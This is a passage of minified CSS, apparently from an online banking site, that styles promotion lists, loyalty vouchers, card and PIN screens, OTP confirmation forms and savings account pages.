.merchant-list .merchant-item{padding:12px 0}.modal-merchant-list .merchant-list .merchant-item__name{font-weight:bold}.modal-merchant-list .merchant-list .merchant-item:not(:first-child){border-top:1px solid #C9D9EA}.favorite-promotion__list{margin:0 16px;display:flex;flex-direction:row}.favorite-promotion__list .slick-slide:not(:first-child){margin-left:24px}.favorite-promotion__list .wrap-voucher{width:256px !important;flex-shrink:0;flex-basis:calc(100% / 5 - 24px);min-width:256px}.promotion-main .lo-category{position:relative}.promotion-main .lo-category .tic{cursor:pointer;position:relative;white-space:nowrap;flex:1 0 auto;justify-content:center;min-width:auto;background-color:white;color:#062A46}.promotion-main .lo-category .tic:not(:last-child){border-right:none}.promotion-main .lo-category .tic:not(:first-child){border-left:1px solid #E7EEF3}.promotion-main .lo-category .tic *{pointer-events:none}.promotion-main .lo-category .tic img{width:24px}.promotion-main .tabs-scroll{position:relative;overflow:hidden;border-radius:10px 10px 0 0}.promotion-main .tabs-scroll .tab-indicator{position:absolute;flex-shrink:0;width:0px;height:3px;left:0;bottom:0;background-color:#EA114E;transition:all .3s;z-index:1}.promotion-main .tabs-scroll__wrap{position:relative;border-bottom:1px solid #E7EEF3;border-radius:10px 10px 0 0;overflow:hidden}.promotion-main .tabs-scroll__wrap .tab-scroll-btn{position:absolute;top:50%;transform:translateY(-50%);left:0;height:100%;width:40px;display:inline-flex;align-items:center;justify-content:center;background-image:linear-gradient(to left, rgba(255,255,255,0), white 40%);cursor:pointer;z-index:1}.promotion-main .tabs-scroll__wrap .tab-scroll-btn.cross{background-image:linear-gradient(to left, rgba(255,255,255,0), white 40%)}.promotion-main .tabs-scroll__wrap .tab-scroll-btn--right{left:auto;right:0;transform:translateY(-50%) rotateZ(180deg)}.promotion-main .tabs-scroll__wrap .tab-scroll-btn .arrow-left,.promotion-main .tabs-scroll__wrap .tab-scroll-btn .arrow-right{border:solid #005993;border-width:0 2.5px 2.5px 0;display:inline-block;padding:2.5px;transform:rotate(135deg)}.promotion-main__filter{margin:-12px;padding:0 32px;display:flex;flex-wrap:wrap}.promotion-main__filter__box{display:flex;flex-wrap:wrap;flex:1;flex-basis:448px}.promotion-main__filter .box-search{position:relative}.promotion-main__filter .box-search__input{width:0;overflow:hidden;-webkit-transition:width 0.2s;-moz-transition:width 0.2s;-o-transition:width 0.2s;transition:width 0.2s}.promotion-main__filter .box-search__toggle{position:absolute;top:50%;transform:translateY(-50%);cursor:pointer;display:flex;align-items:center;left:0;-webkit-transition:left 0.2s;-moz-transition:left 0.2s;-o-transition:left 0.2s;transition:left 0.2s}.promotion-main__filter .box-search__toggle img{width:24px;margin:12px 4px 12px 0}.promotion-main__filter .box-search__toggle--label{white-space:nowrap;overflow:hidden;max-width:100%;-webkit-transition:max-width 0.2s;-moz-transition:max-width 0.2s;-o-transition:max-width 0.2s;transition:max-width 0.2s}.promotion-main__filter .box-search.open .box-search__input{width:100%}.promotion-main__filter .box-search.open .box-search__toggle{left:calc(100% - 48px);pointer-events:none}.promotion-main__filter .box-search.open .box-search__toggle img{margin:12px 14px}.promotion-main__filter .box-search.open .box-search__toggle--label{max-width:0}.promotion-main__filter .filter-item{margin:12px;flex-grow:1;flex-shrink:0;flex-basis:calc(100% / 4 - 24px);min-width:200px;max-width:416px}.promotion-main__filter .filter-item.fake{margin:0 12px}@media screen and (max-width: 1023px){.promotion-main__filter{padding:0 16px;margin:-8px}.promotion-main__filter .filter-item{margin:8px}.promotion-main__filter .filter-item.fake{margin:0 8px}}.promotion-main__list{padding:0 32px;margin:-12px;display:flex;flex-wrap:wrap;align-items:stretch}.promotion-main__list .wrap-voucher{margin:12px;flex-grow:1;flex-shrink:0;flex-basis:calc(100% / 5 - 24px);min-width:256px}.promotion-main__list .wrap-voucher.fake{margin:0 12px}@media screen and (max-width: 1023px){.promotion-main__list{padding:0 16px;margin:-8px}.promotion-main__list .wrap-voucher{margin:8px}}.promotion-main{-webkit-box-shadow:0px 8px 10px rgba(32,71,101,0.05);-moz-box-shadow:0px 8px 10px rgba(32,71,101,0.05);box-shadow:0px 8px 10px rgba(32,71,101,0.05);border-radius:10px;background-color:white}.card-promotion .promotion-type{display:flex;margin:-12px;flex-wrap:wrap}.card-promotion .promotion-type__item{margin:12px;min-width:168px;flex-grow:1;flex-shrink:0;flex-basis:calc(20% - 24px);cursor:pointer}.card-promotion .promotion-type__item .item-content{position:relative;width:100%;padding-top:56%;background-position:center;background-size:cover;border-radius:8px;overflow:hidden}.card-promotion .promotion-type__item .item-content__name{color:white;position:absolute;top:0;left:0;text-align:center;width:100%;height:100%;padding:0 8px;display:flex;align-items:center;justify-content:center;background:linear-gradient(357.77deg, rgba(0,89,147,0.568627) 15%, rgba(0,89,147,0.3) 85%)}.auto-debit-registration-confirm__body__radio-group>:not(:first-child){margin-left:32px}.auto-debit-registration-confirm__body__radio-group .label-radio{vertical-align:text-top}.auto-debit-registration-confirm__body__otp{margin-top:24px}.auto-debit-registration-confirm__body__otp .label{color:#005993}.auto-debit-registration-confirm__body__otp .code{margin-top:24px}.auto-debit-registration-form__body.overlay{opacity:0.4;pointer-events:none}.auto-debit-registration-form__body__radio-group{display:flex;flex-direction:column}.auto-debit-registration-form__body__radio-group>*:not(:first-child){margin-top:16px}.auto-debit-registration-form__body__radio-group .label-radio{vertical-align:text-top}.pin-input .card-info{display:flex;align-items:stretch;padding:0}.pin-input .note{white-space:pre-line;font-size:14px;color:#697F90}.change-pin-success{padding-top:40px}.card-empty{display:flex;padding-top:16px;justify-content:center;align-items:center;text-align:center}.card-empty__bg{width:100%;max-width:312px;height:200px;background-image:url("/static/image/background/empty.svg");background-size:100%;background-repeat:no-repeat;background-position:center 20px}.card-row .pl-input-group__content .pl-input-group__row{align-items:center}.card-row__card-info .card-type{font-size:16px;font-weight:500;line-height:22px}.card-row__card-info .card-num{margin-top:8px;font-weight:500;font-size:24px;line-height:24px}.card-row__card-info .card-more-info{margin-top:16px;display:flex}.card-row__card-info .card-more-info .group-info:not(:first-child){margin-left:48px;position:relative}.card-row__card-info .card-more-info .group-info:not(:first-child)::after{content:'';position:absolute;top:50%;transform:translateY(-50%);left:-24px;height:36px;width:1px;background-color:#C9D9EA}.card-row__card-info .card-more-info .group-info .label{color:#9EB3C9}.card-row__card-img{height:116px;border-radius:4px;overflow:hidden;width:fit-content}.card-row__card-img img{height:100%}.card-select{display:flex;align-items:stretch}.card-select__img{width:144px;height:91px;flex-shrink:0;background-color:#F4F8FB;border-radius:4px;margin-left:16px}.card-select__select{flex:1;max-width:512px}@media screen and (max-width: 1023px){.card-select{display:block}.card-select__select{max-width:none}.card-select__img{margin:0 auto;margin-top:16px}}.hide-show__content{margin-right:16px}.input-wrapper{width:100%}.input-wrapper .input-title{font-style:normal;font-weight:500;font-size:14px;line-height:16px;color:#062A46;margin-bottom:8px}.input-wrapper>input{height:48px;font-style:normal;font-weight:500;line-height:40px;font-size:20px;border:1px solid #C9D9EA}.format-region-option{display:flex;justify-content:flex-start;padding:16px 0;margin:0 16px;border-bottom:1px dashed #C9D9EA;align-items:center;cursor:pointer}.format-region-option>img{width:16px;height:16px}.format-region-option .region-item{padding-left:0}.format-region-option .region-item::before{display:none}.region-item{padding:4px 8px;position:relative;display:inline-block}.region-item::before{content:'';position:absolute;top:50%;transform:translateY(-50%);left:0;height:12px;width:1px;background-color:#C9D9EA}.region-item:first-child{padding-left:0}.region-item:first-child::before{display:none}.region-item img{width:24px;height:24px;margin-right:8px;object-fit:cover}.rest-region{padding:4px 8px;display:inline-block}.select-region__footer{text-align:right;background:linear-gradient(0deg, #fff 50%, rgba(255,255,255,0) 155.71%);color:#005993}.select-region__footer__button{padding:16px;display:inline-block;cursor:pointer}.limit-region-form .group-disable{filter:grayscale(1);opacity:.5;pointer-events:none}.limit-region-form .input-limit-group>*:not(:first-child){margin-top:24px}.limit-region-confirm .radio-group>*:not(:first-child){margin-left:16px}.limit-region-confirm__otp{margin-top:24px}.limit-region-confirm__otp .hint{color:#005993}.limit-region-confirm__otp .wrap-input-code{margin-top:24px}.online-payment-registration__body.overlay{opacity:0.4;pointer-events:none}.online-payment-registration__body__radio-group{display:flex;flex-direction:column}.online-payment-registration__body__radio-group>*:not(:first-child){margin-top:16px}.online-payment-registration__body__radio-group .label-radio{vertical-align:text-top}.online-payment-registration__body__radio-group .radio-hint{cursor:pointer;margin-left:24px;color:#9EB3C9;font-size:16px;font-weight:400;line-height:24px}.online-payment-registration-confirm__body__radio>:not(:first-child){margin-left:32px}.online-payment-registration-confirm__body__otp{margin-top:24px}.online-payment-registration-confirm__body__otp .label{color:#005993}.online-payment-registration-confirm__body__otp .code{margin-top:24px}.sms-setting-confirm__body__radio>:not(:first-child){margin-left:32px}.sms-setting-confirm__body__otp{margin-top:24px}.sms-setting-confirm__body__otp .label{color:#005993}.sms-setting-confirm__body__otp .code{margin-top:24px}.sms-setting-form__body__phone-input{position:relative}@media (max-width: 1376px){.sms-setting-form__body__phone-input{margin-right:36px}}.sms-setting-form__body__phone-input:hover{color:red}.sms-setting-form__body__phone-input:hover .delete-icon{visibility:visible}.sms-setting-form__body__phone-input .delete-icon{visibility:visible;position:absolute;top:0;left:100%;height:48px;display:flex;align-items:center;padding:0 16px;cursor:pointer}.sms-setting-form__body__phone-input .delete-icon:hover{visibility:visible}.sms-setting-form__body__add-phone-button{font-size:16px;font-weight:500;line-height:22px;color:#005993;cursor:pointer}.sms-setting-form__body__add-phone-button:not(:first-child){margin-top:8px}.sms-setting-form__body__add-phone-button img{vertical-align:bottom;margin-right:8px}.closeAccount-internal__otp-form{color:#005993}.closeAccount-internal__otp-form>*{margin-top:24px;white-space:pre-wrap}.db-promotion{width:100%;margin-top:40px}@media screen and (max-width: 1279px){.db-promotion{margin-top:24px}}@media screen and (max-width: 1023px){.db-promotion{margin-top:8px}}.wrap-filter-account{display:inline-block;text-align:center}.wrap-filter-account .filter-account{width:80px;height:80px;display:inline-flex;border-radius:100%;border:1px solid #C9D9EA;position:relative;justify-content:center;align-items:center}.wrap-filter-account .filter-account .status-icon{position:absolute;top:8px;right:2px}.wrap-filter-account .filter-account img.account-type-icon{-webkit-filter:drop-shadow(0px 7px 8px rgba(59,88,107,0.14));filter:drop-shadow(0px 7px 8px rgba(59,88,107,0.14))}.wrap-filter-account .account-label{color:#9EB3C9}.wrap-filter-account.active .filter-account{border-color:#EA114E}.wrap-filter-account.active .account-label{color:#005993}.change-pin-input .input-group .hint{text-align:left}.change-pin-input .note{text-align:left;white-space:pre-line;font-size:14px;color:#697F90}.modal-balance-details .modal-container{max-width:656px}.modal-balance-details .modal-container .filter-view{width:98px;min-width:98px}.modal-balance-details .modal-container .balance-item{padding:24px;flex-grow:0;flex-shrink:0;flex-basis:calc(50% - 24px);border-bottom:1px solid #E3EEF5}.modal-balance-details .modal-container .balance-item:nth-child(odd){padding-left:0;margin-left:24px}.modal-balance-details .modal-container .balance-item:nth-child(even){padding-right:0;margin-right:24px}.modal-balance-details .modal-container .balance-item:nth-last-child(1),.modal-balance-details .modal-container .balance-item:nth-last-child(2):not(:nth-child(even)){border-bottom:none}@media screen and (max-width: 1023px){.modal-container .balance-item{padding:24px 0 !important;margin:0 24px !important;flex-grow:0;flex-shrink:0;flex-basis:calc(100% - 48px) !important;border-bottom:none !important}.modal-container .balance-item:not(:nth-last-child(1)){border-bottom:1px solid #E3EEF5 !important}}.login-modal{width:100%;max-width:800px}.login-modal .modal-content{padding:64px;display:flex;flex-direction:column;align-items:center}.toggle-status-modal .modal-container{width:100%;max-width:616px}.toggle-status{overflow:hidden}.toggle-status__card-info{padding-top:64px;position:relative;pointer-events:none}.toggle-status__card-info .block-card{margin:auto}.toggle-status__card-info .block-card.blocked{mix-blend-mode:initial;background-image:url("/static/image/icon/card-bg-grey.svg")}.toggle-status__card-info .block-card .card-overlay{display:none}.toggle-status__card-info:before{content:'';position:absolute;background:#005993;width:120%;height:380px;top:0;left:-10%;border-radius:40%;transform:translateY(-50%)}.toggle-status__content{margin-top:8px;padding:32px;padding-bottom:64px;text-align:center}.toggle-status__content .content__main{margin-top:24px}.toggle-status__content .content__actions{margin-top:40px}.toggle-status__content .content__actions>*{margin-left:16px;min-width:120px}.toggle-status__content .content__actions>*:first-child{margin-left:0}.toggle-status__content .content-lock{color:#697F90}.toggle-status__content .content-lock .e-pin{border:3px solid #005993;color:#005993;width:fit-content;margin:auto;padding:8px 56px;border-radius:10px;font-size:18px}.toggle-status__content .content-lock .e-pin-title{font-size:16px;color:#000;margin-top:24px;font-weight:500;margin-bottom:8px}.toggle-status__content .content-lock .e-pin-note{text-align:left;white-space:pre-line}.toggle-status__content .content-lock .small{font-size:14px}.toggle-status__content .activate-card__message{color:#005993}.toggle-status__content .activate-card .wrap-input-code{margin:auto;margin-top:16px}.home-page{padding:40px 64px;min-height:100%;-webkit-transition:padding 0.8s;-moz-transition:padding 0.8s;-o-transition:padding 0.8s;transition:padding 0.8s}.home-page .view-details{display:none}.home-page .heading{color:#062A46}.home-page .heading img{margin-left:8px}.home-page .summary{display:flex;margin:24px 0 32px;justify-content:space-between}.home-page .summary .item-type{text-align:center;overflow:hidden;flex:1;margin:0 12px;min-width:80px}.home-page .summary .item-type:first-child{margin-left:0}.home-page .summary .item-type:nth-last-child(1){margin-right:0}.home-page .summary .balance-type{color:#9EB3C9;font-size:12px;line-height:20px;margin-top:16px}.home-page .summary .sum-balance{margin-top:8px;min-height:20px;line-height:20px}.home-page .summary .sum-balance .currency:not(:first-child){margin-top:8px}.home-page .all-information{position:relative;padding-bottom:16px}.home-page .all-information .row-account{display:flex;flex-wrap:nowrap;overflow:auto;padding-bottom:8px}.home-page .all-information .row-account .block-item,.home-page .all-information .row-account>*{position:relative;width:280px;flex-shrink:0}.home-page .all-information .row-account .block-item:hover,.home-page .all-information .row-account>*:hover{margin-top:0}.home-page .all-information .row-account .block-item:not(:first-child),.home-page .all-information .row-account>*:not(:first-child){margin-left:16px}.home-page .all-information .row-account:not(:first-child){margin-top:16px}.home-page .block-item{width:100%;position:absolute;-webkit-transition:top 0.3s ease-in-out,left 0.3s ease-in-out,width 0.3s ease-in-out,transform 0.2s ease-in-out,margin 0.2s ease-in-out;-moz-transition:top 0.3s ease-in-out,left 0.3s ease-in-out,width 0.3s ease-in-out,transform 0.2s ease-in-out,margin 0.2s ease-in-out;-o-transition:top 0.3s ease-in-out,left 0.3s ease-in-out,width 0.3s ease-in-out,transform 0.2s ease-in-out,margin 0.2s ease-in-out;transition:top 0.3s ease-in-out,left 0.3s ease-in-out,width 0.3s ease-in-out,transform 0.2s ease-in-out,margin 0.2s ease-in-out}.home-page .block-item.active{border:none !important;-webkit-box-shadow:0px 8px 15px rgba(124,158,177,0.1),0px 0px 0px 1px #FFB8C2 inset;-moz-box-shadow:0px 8px 15px rgba(124,158,177,0.1),0px 0px 0px 1px #FFB8C2 inset;box-shadow:0px 8px 15px rgba(124,158,177,0.1),0px 0px 0px 1px #FFB8C2 inset}.home-page .block-item .card-no{padding:4px 16px 6px;margin:0;margin-left:-16px}.home-page .block-item .card-status{margin:0px}.home-page .block-item.fake{margin:0}@media screen and (min-width: 1024px){.home-page .block-item:hover{margin-top:-16px}.home-page .block-item:hover::after{content:'';position:absolute;bottom:-16px;left:0;width:100%;height:16px}}@media (max-width: 1400px){.home-page .block-item .card-no{letter-spacing:2px}.home-page .block-item .card-no .overlay-text{color:#A8B9C6}.home-page .block-item .card-no .element:nth-of-type(4n){margin-right:12px}.home-page .block-item .card-no .element:last-of-type{margin-right:0}}@media screen and (max-width: 1279px){.home-page{padding:40px 24px}.home-page .view-details{display:block}.home-page .balance-type,.home-page .sum-balance{display:none}}@media screen and (max-width: 1023px){.home-page{padding:24px 16px}.home-page .summary{margin:24px 0;overflow:auto}}.example-date-picker{display:flex;flex-flow:row;justify-content:space-between}.example-date-picker>div{margin-bottom:20px;display:flex;flex-flow:column}.error-access-denied,.error-not-found,.error-not-allow{display:flex;min-height:100%;padding:36px 0}.infrastructure-tax .tax-search .tax-separate{width:8px;height:2px;background-color:#9EB3C9;margin:0 16px;margin-top:23px}.infrastructure-tax .tax-search .tax-number-10,.infrastructure-tax .tax-search .tax-number-3{width:100%}.infrastructure-tax .tax-search .tax-number-10 input,.infrastructure-tax .tax-search .tax-number-3 input{padding-left:16px;padding-right:16px}.infrastructure-tax .tax-search .tax-number-10{max-width:148px}.infrastructure-tax .tax-search .tax-number-3{max-width:88px}@media screen and (max-width: 1023px){.infrastructure-tax .tax-info__table{display:none}}.acc-saving__form .wrapper-term{display:flex;flex-direction:column;position:relative}.acc-saving__form .wrapper-term a{font-weight:600;font-size:14px;text-align:right;color:#1A73AB;padding-top:4px;position:absolute;right:0;top:-32px}.acc-saving__form__group-date-select{margin-top:16px;display:flex;flex-direction:row}@media screen and (max-width: 1023px){.acc-saving__form__group-date-select{flex-direction:column}}.acc-saving__form__group-date-select>*{flex:1}@media screen and (min-width: 1024px){.acc-saving__form__group-date-select>*:not(:first-child){margin-left:16px}}@media screen and (max-width: 1023px){.acc-saving__form__group-date-select>*:not(:first-child){margin-top:8px}}.online-saving-regular-form__body .wrapper-term{display:flex;flex-direction:column;position:relative}.online-saving-regular-form__body .wrapper-term a{font-weight:600;font-size:14px;text-align:right;color:#1A73AB;padding-top:4px;position:absolute;right:0;top:-32px}.modal-interest .interest-iframe{border:none;width:100%;min-height:calc(100vh - 90px);border-radius:10px}.online-saving{color:#062A46}.online-saving__success .modal-row{position:relative}.online-saving__success .small-modal-wrapper{border-radius:10px;background-color:#E7EEF3;padding:16px;width:100%}.online-saving__success .small-modal{border-radius:10px;display:flex;align-items:stretch;flex-direction:row}@media screen and (max-width: 1023px){.online-saving__success .small-modal{flex-direction:column}}.online-saving__success .small-modal .saving-book__row{padding:12px 0 12px 12px;position:relative}.online-saving__success .small-modal .saving-book__row::before{content:'';width:4px;height:4px;border-radius:50%;display:block;background-color:#005993;position:absolute;left:0;top:21px}@media screen and (max-width: 1023px){.online-saving__success .small-modal .saving-book__row{flex-wrap:wrap;justify-content:space-between;font-size:14px;font-weight:400;line-height:22px}.online-saving__success .small-modal .saving-book__row>*{flex-basis:auto;flex-grow:1}}@media screen and (min-width: 1024px){.online-saving__success .small-modal .saving-book__row:not(:last-child){border-bottom:1px dashed #C9D9EA}}@media screen and (max-width: 1023px){.online-saving__success .small-modal .saving-book__row>:first-child::after{content:'';flex-grow:1;border-bottom:1px dashed #C9D9EA;margin-left:4px;transform:translateY(-4px)}}@media screen and (min-width: 1024px){.online-saving__success .small-modal .saving-book__row>:first-child{flex-basis:calc(100% / 12 * 5);flex-shrink:0}}@media screen and (min-width: 1024px){.online-saving__success .small-modal .saving-book__row>:nth-child(2){margin-left:8px}}@media screen and (max-width: 1023px){.online-saving__success .small-modal .saving-book__row>:nth-child(2){justify-content:flex-end;margin-left:auto;text-align:right}.online-saving__success .small-modal .saving-book__row>:nth-child(2)::before{content:'';flex-grow:1;border-bottom:1px dashed #C9D9EA;margin-right:4px;transform:translateY(-4px)}}.online-saving__success .small-modal .info{box-sizing:border-box;position:relative;display:flex;flex-direction:column;justify-content:flex-end;height:100%;min-height:280px;padding:32px 16px;overflow:hidden}.online-saving__success .small-modal .info .type{font-size:16px;font-weight:500;line-height:22px;margin-top:12px;margin-bottom:12px}.online-saving__success .small-modal .info .amount{font-size:28px;font-weight:500;line-height:32px;display:flex;flex-wrap:wrap;margin-bottom:24px}.online-saving__success .small-modal .info .amount span{color:#9EB3C9;margin-left:4px}@media screen and (max-width: 1023px){.online-saving__success .small-modal .info .amount{font-size:24px;font-weight:500;line-height:32px}}.online-saving__success .small-modal .info .No span{font-size:20px;font-weight:500;line-height:24px;text-decoration:underline;color:#005993;margin-left:8px}.online-saving__success .small-modal .info .close-modal{position:absolute;top:0;left:24px;display:block;background-color:#005993;color:white;padding:0 16px;border-bottom-left-radius:6px;border-bottom-right-radius:6px}.online-saving__success .small-modal .info-confetti{position:absolute;top:-32px;right:-48px;user-select:none}.online-saving__success .small-modal .info-wrapper{overflow:hidden;position:relative;background:#fff;border-radius:5px}@media screen and (min-width: 1024px){.online-saving__success .small-modal .info-wrapper{flex-basis:35%;min-width:240px}}.online-saving__success .small-modal .info::after{content:'';position:absolute;top:0;left:0;width:100%;height:100%;background:url("/static/image/logo/logonotext-transparent.png") no-repeat;background-size:192px;background-position:center;transform:translateX(50%)}@media screen and (max-width: 1023px){.online-saving__success .small-modal .info::after{transform:translateY(50%);z-index:1}}.online-saving__success .small-modal .detail{position:relative;overflow:hidden;width:100%;padding:16px}.online-saving__success .small-modal .detail::after{content:'';position:absolute;top:0;left:0;width:100%;height:100%;pointer-events:none;background:url("/static/image/logo/logonotext-transparent.png") no-repeat;background-size:192px;background-position:center;transform:translateX(-50%)}@media screen and (max-width: 1023px){.online-saving__success .small-modal .detail::after{transform:translateY(-50%);z-index:1}}.online-saving__success .small-modal .detail-wrapper{background:#fff;display:flex;align-items:center;border-radius:5px}@media screen and (min-width: 1024px){.online-saving__success .small-modal .detail-wrapper{margin-left:2px;flex-grow:1}}@media screen and (max-width: 1023px){.online-saving__success .small-modal .detail-wrapper{margin-top:2px}}.online-saving__notice{margin-top:32px;color:#005993;white-space:pre-wrap}.online-saving__term-option{display:flex;padding:12px 0px;justify-content:space-between;font-weight:500}.settlement-confirm__body__radio>:not(:first-child){margin-left:32px}.settlement-confirm__body__otp{margin-top:24px}.settlement-confirm__body__otp .label{color:#005993}.settlement-confirm__body__otp .code{margin-top:24px}.settlement-form__body__title{padding:32px 0 16px 0}.settlement__content .amount-vi{margin-left:24px;color:#9EB3C9}.loyalty-advertise__item{background-color:#fff}.loyalty-advertise__item img{width:100%;height:100%;object-fit:cover}.loyalty-advertise__item a{width:100%}@media (max-width: 768px){.loyalty-banner__wrap{padding-bottom:43%}}.loyalty-banner{position:absolute;top:0;left:0;width:100%;height:100%;background-color:#E7EEF3}.loyalty-banner__slide{position:absolute;width:100%;height:100%}.loyalty-banner__slide img{width:100%;height:100%;object-fit:cover;object-position:right}.loyalty-banner .slick-list,.loyalty-banner .slick-track,.loyalty-banner .slick-slide{height:100%;position:relative}.loyalty-banner .slick-dots{padding:0;left:6%;bottom:5%;text-align:left}.loyalty-banner .slick-dots li{margin:0;width:auto;height:auto}.loyalty-banner .slick-dots li:not(:first-child){margin-left:4px}.loyalty-banner__dot{display:inline-block;width:6px;height:6px;border-radius:10px;background-color:#9EB3C9;-webkit-transition:background-color 0.2s,width 0.2s;-moz-transition:background-color 0.2s,width 0.2s;-o-transition:background-color 0.2s,width 0.2s;transition:background-color 0.2s,width 0.2s}.slick-active .loyalty-banner__dot{background-color:#1A73AB;width:16px}.loy-breadcrumbs{height:20px;display:flex;align-items:center;margin-bottom:4px;font-size:12px;font-weight:400;line-height:20px}.loy-breadcrumbs img{width:16px}.lo-category{position:relative}.lo-category__item{display:flex;justify-content:center;align-items:center;padding:16px;position:relative;min-width:160px;flex-shrink:0;cursor:pointer}.lo-category__item:not(:last-of-type){border-right:1px solid #E7EEF3}.lo-category__item__ic{width:24px;height:24px}.lo-category__item__txt{white-space:nowrap;margin-left:8px}.tabs-scroll{position:relative;overflow:hidden}.tabs-scroll .tab-indicator{position:absolute;flex-shrink:0;width:0px;height:3px;left:0;bottom:0;background-color:#79CCF3;transition:all .3s}.tabs-scroll__wrap{position:relative;border-bottom:1px solid #E7EEF3}.tabs-scroll__wrap .tab-scroll-btn{position:absolute;top:50%;transform:translateY(-50%);left:0;height:100%;width:40px;display:inline-flex;align-items:center;justify-content:center;background:linear-gradient(to right, white 50%, rgba(255,255,255,0.2));cursor:pointer;z-index:1}.tabs-scroll__wrap .tab-scroll-btn--right{background:linear-gradient(to left, white 50%, rgba(255,255,255,0.2));left:auto;right:0}.tabs-scroll__wrap .tab-scroll-btn .arrow-left{border:solid #8294A2;border-width:0 2.5px 2.5px 0;display:inline-block;padding:2.5px;transform:rotate(135deg)}.tabs-scroll__wrap .tab-scroll-btn .arrow-right{border:solid #8294A2;border-width:0 2.5px 2.5px 0;display:inline-block;padding:2.5px;transform:rotate(-45deg)}.loy-faqs-mail__btn{background-color:#fff !important}.loy-faqs-mail__modal .modal-container{width:100%;max-width:800px}.loy-faqs-mail__modal .modal-content{padding:32px}@media screen and (max-width: 1023px){.loy-faqs-mail__modal .modal-content{padding:16px}}.loy-faqs-mail__modal__header{position:relative;display:flex;flex-direction:row}.loy-faqs-mail__modal__header .close-icon{margin-left:auto;transform:translate(4px, -4px)}.loyalty-hd{margin-bottom:20px;font-size:16px;font-weight:500;line-height:24px}@media screen and (max-width: 767px){.loyalty-hd{margin-bottom:8px}}@media screen and (min-width: 1024px){.loyalty-hd__point img{display:none}}.loyalty-hd__point span{font-size:16px;font-weight:500;line-height:24px;color:#005993}@media screen and (max-width: 1023px){.loyalty-hd__point span{display:none}}.loyalty-hd__point a{margin-left:8px;font-size:20px;font-weight:600;line-height:28px;color:#EE2E63}.loyalty-hd__cart{position:relative;padding-left:16px;margin-left:16px}.loyalty-hd__cart::after{content:'';position:absolute;width:1px;height:16px;background-color:#C9D9EA;top:50%;left:0;transform:translateY(-50%)}.modal-vch-manual{padding:16px;position:relative}.modal-vch-manual__close{position:absolute;top:12px;right:12px;cursor:pointer}.lo-promotions{margin-top:36px}.lo-promotions .lo-promotions__header{margin-bottom:24px;font-size:20px;font-weight:600;line-height:30px}@media screen and (max-width: 1023px){.lo-promotions .lo-promotions__header{flex-direction:column;align-items:initial;margin-bottom:12px}}.lo-promotions__grid{padding:24px 12px}@media screen and (max-width: 1279px){.lo-promotions__grid{padding:16px 8px}}@media screen and (max-width: 1023px){.lo-promotions__grid{padding:16px 4px}}@media screen and (max-width: 767px){.lo-promotions__grid{padding:16px 2px}}.lo-promotions__grid__wrap{border-radius:10px;overflow:hidden}.lo-promotions__grid__item{flex-basis:25%;padding:0 12px;margin-bottom:24px}@media screen and (max-width: 1279px){.lo-promotions__grid__item{flex-basis:calc(100% / 3);padding:0 8px;margin-bottom:16px}}@media screen and (max-width: 1023px){.lo-promotions__grid__item{padding:0 4px;margin-bottom:8px}}@media screen and (max-width: 767px){.lo-promotions__grid__item{flex-basis:50%;padding:0 2px}}@media screen and (max-width: 374px){.lo-promotions__grid__item{flex-basis:100%}}.lo-promotions__filter--pool{width:226px;margin-left:auto;padding-left:16px}.lo-promotions__filter--pool>*{width:100%}@media screen and (max-width: 1023px){.lo-promotions__filter--pool{width:100%;margin-top:8px;padding-left:0;margin-left:0}}.lo-promotions__filter--point{margin-left:16px;width:226px}.lo-promotions__filter--point>*{width:100%}@media screen and (max-width: 1023px){.lo-promotions__filter--point{width:100%;margin-top:8px;margin-left:0}}.loy-promotion-item{position:relative;border-radius:8px;overflow:hidden;border:1px solid #E3EEF5;background-color:#fff}.loy-promotion-item__media{position:relative}.loy-promotion-item__media__img{position:relative;padding-bottom:62%;background-color:#E7EEF3}.loy-promotion-item__media__img img{position:absolute;top:0;left:0;width:100%;height:100%}.loy-promotion-item__content{background-color:#fff}.loy-promotion-item__description{font-size:16px;font-weight:500;line-height:24px;color:#062A46;padding:16px 16px 0 16px;display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical;overflow:hidden;min-height:64px}@media screen and (max-width: 767px){.loy-promotion-item__description{padding:8px 8px 0 8px;font-size:14px;font-weight:500;line-height:20px;min-height:48px}}.loy-promotion-item__out-of-stock{color:#EA114E}.loy-promotion-item__point{font-size:20px;font-weight:600;line-height:30px;color:#EA114E}@media screen and (max-width: 767px){.loy-promotion-item__point{font-size:16px;font-weight:500;line-height:28px}}.loy-promotion-item__cart{cursor:pointer}.loy-promotion-item__footer{padding:8px 16px 16px 16px}@media screen and (max-width: 767px){.loy-promotion-item__footer{padding:8px}}.loy-promotion-item .tag-new{position:absolute;top:0;left:0;background-color:#FFD12E;transform-origin:top center;transform:translateX(-50%) rotateZ(-45deg);padding:16px 8px 4px;width:120px;text-align:center;text-transform:uppercase;font-size:11px;font-weight:700;line-height:16px;color:#B8711B}.promotion-zone__carousel__wrap{margin:0 -12px}.promotion-zone__carousel__wrap .slick-dots{bottom:-32px}.promotion-zone__carousel__wrap .slick-dots .slick-active button::before{color:#697F90;opacity:unset}.promotion-zone__carousel__wrap .slick-dots li{cursor:pointer;width:16px;margin:0}.promotion-zone__carousel__wrap .slick-dots li button::before{font-size:8px;color:#C9D9EA;opacity:unset}.promotion-zone{margin-bottom:64px}.promotion-zone__tabs{margin-bottom:24px}.count-btn{display:flex;align-items:center}.count-btn__decrease,.count-btn__increase{cursor:pointer;outline:none;border:none;background-color:white;padding:0;margin:0}.count-btn__num{border:none;font-size:16px;font-weight:500;line-height:24px;color:#005993;width:36px;text-align:center}.count-btn__num::-webkit-outer-spin-button,.count-btn__num::-webkit-inner-spin-button{-webkit-appearance:none;margin:0}.count-btn__num[type=number]{-moz-appearance:textfield}.tri-ul__label{font-size:18px;font-weight:500;line-height:24px;margin-bottom:16px}.tri-ul__ul{list-style:none;margin:0;padding-inline-start:0px}.tri-ul__ul li{font-size:16px;font-weight:400;line-height:24px;position:relative;padding-left:1em;text-indent:-1em}.tri-ul__ul li:not(:first-child){margin-top:8px}.tri-ul__ul li::before{content:'';display:inline-block;width:0;height:0;border-top:5px solid transparent;border-bottom:5px solid transparent;border-left:8px solid #EA114E;margin-right:8px}@media screen and (max-width: 767px){.vch-box{flex-direction:column;margin-right:16px}}.vch-box__img{flex-shrink:0;position:relative;flex-basis:216px;background-color:#E7EEF3;height:-webkit-fit-content;height:-moz-fit-content;height:fit-content;min-height:100px;border-radius:16px;overflow:hidden}@media screen and (max-width: 767px){.vch-box__img{flex-basis:calc(100% / 